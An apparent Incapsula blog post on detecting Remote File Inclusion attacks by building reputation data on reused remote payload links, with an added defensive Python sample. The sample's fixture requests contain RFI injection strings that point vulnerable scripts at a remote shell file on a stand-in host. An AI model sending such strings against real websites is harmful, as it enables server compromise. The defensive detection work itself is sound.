Shutting the Door on RFI Attacks with Crowdsourced Security

Today we’re introducing new detection methods to further improve our Remote File Inclusion (RFI) protective measures. These new features leverage the Incapsula crowdsourcing capabilities to help gain intelligence about RFI attack patterns, and provide an additional layer of protection for our clients’ websites.

To demonstrate these new security measures, and the way they augment the existing Incapsula RFI protection capabilities, let’s start off by providing some basic insights on motives and methodologies of RFI attacks.

A typical RFI attack relies on two factors: a scanner that detects and exploits the RFI vulnerability, and an RFI link, i.e., a remote location that delivers the malicious payload. In this two-factor equation, the scanner signature is often the variable, even more so when dealing with undocumented and zero-day threats. However, our data shows the RFI links to be a somewhat surprising ‘constant,’ which can be used to the white hat’s advantage.

Typical RFI Methodology

While reviewing over six months of accumulated RFI data, gathered across billions of sessions, we saw consistent correlations between different RFI attacks. Specifically, we noticed that, even when dealing with different attack vectors, the same RFI links were being re-used for multiple assaults on different targets. Moreover, we found that the lifespan for most of these links averages over 60 days, making them perfect tell-tale signs of an RFI attack and great candidates for long-term intelligence gathering.

Using these insights, together with native Incapsula crowdsourcing technology, we’ve developed a reputation-based system that aggregates session data from all websites on the Incapsula network to gather and catalogue large quantities of information about RFI links.
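The cross-site aggregation described above can be sketched as follows. This is an added example, not Incapsula's code: the log format, site names, link values, function names and the `min_sites` threshold are all constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: (protected site, request URI) pairs as an edge proxy might log them.
SAMPLE_REQUESTS = [
    ("shop.example", "/index.php?page=http://files.example.net/sh.txt?"),
    ("blog.example", "/view.php?inc=http://files.example.net/sh.txt?"),
    ("wiki.example", "/main.php?lang=HTTP://Files.Example.NET/sh.txt"),
    ("shop.example", "/go.php?next=https://partner.example.org/landing"),
    ("blog.example", "/index.php?page=about"),
]

SCHEMES = ("http://", "https://", "ftp://")

def extract_links(uri):
    """Return normalized remote URLs carried in query parameter values."""
    links = []
    for _, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if value.lower().startswith(SCHEMES):
            u = urlsplit(value)
            # Lowercase the host and drop query/fragment so variants of the
            # same payload location collapse to one reputation key.
            links.append(f"{u.scheme}://{u.netloc.lower()}{u.path}")
    return links

def build_reputation(requests):
    """Map each remote link to the set of distinct sites it was aimed at."""
    seen = defaultdict(set)
    for site, uri in requests:
        for link in extract_links(uri):
            seen[link].add(site)
    return seen

def flag_links(reputation, min_sites=2):
    """Links reused against at least min_sites sites (threshold is an assumption)."""
    return sorted(l for l, sites in reputation.items() if len(sites) >= min_sites)

def should_block(uri, blocklist):
    """True if the request carries a link already flagged network-wide."""
    return any(link in blocklist for link in extract_links(uri))

if __name__ == "__main__":
    blocklist = set(flag_links(build_reputation(SAMPLE_REQUESTS)))
    # A new parameter name on a new script still matches, because the link is the constant.
    print(should_block("/new.php?tpl=http://files.example.net/sh.txt?&x=1", blocklist))
```

Requiring reuse across several distinct sites keeps a single legitimate redirect parameter, such as the `partner.example.org` entry, out of the blocklist.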

As a result, by monitoring activity across our network, as well as a multitude of already discovered remote payload locations, we’ve compiled a large library of locations — some compromised and some hacker-owned — which serve as centralized distribution points for malicious shell files.

For a security company such assets offer a wealth of benefits; this kind of information helps harden existing security rules and brings down the false-positive ratios. Most importantly, this information also serves as a backbone for an effective early warning system, allowing us to deal with the most extreme scenarios of absolutely unique zero-day threats that could bypass conventional security rules. Last but not least, this information also perfectly complements our existing Backdoor Protect capabilities, by supplying large quantities of shell signatures — straight from the source.

Zero Day RFI, Link Reputation for Early Warning
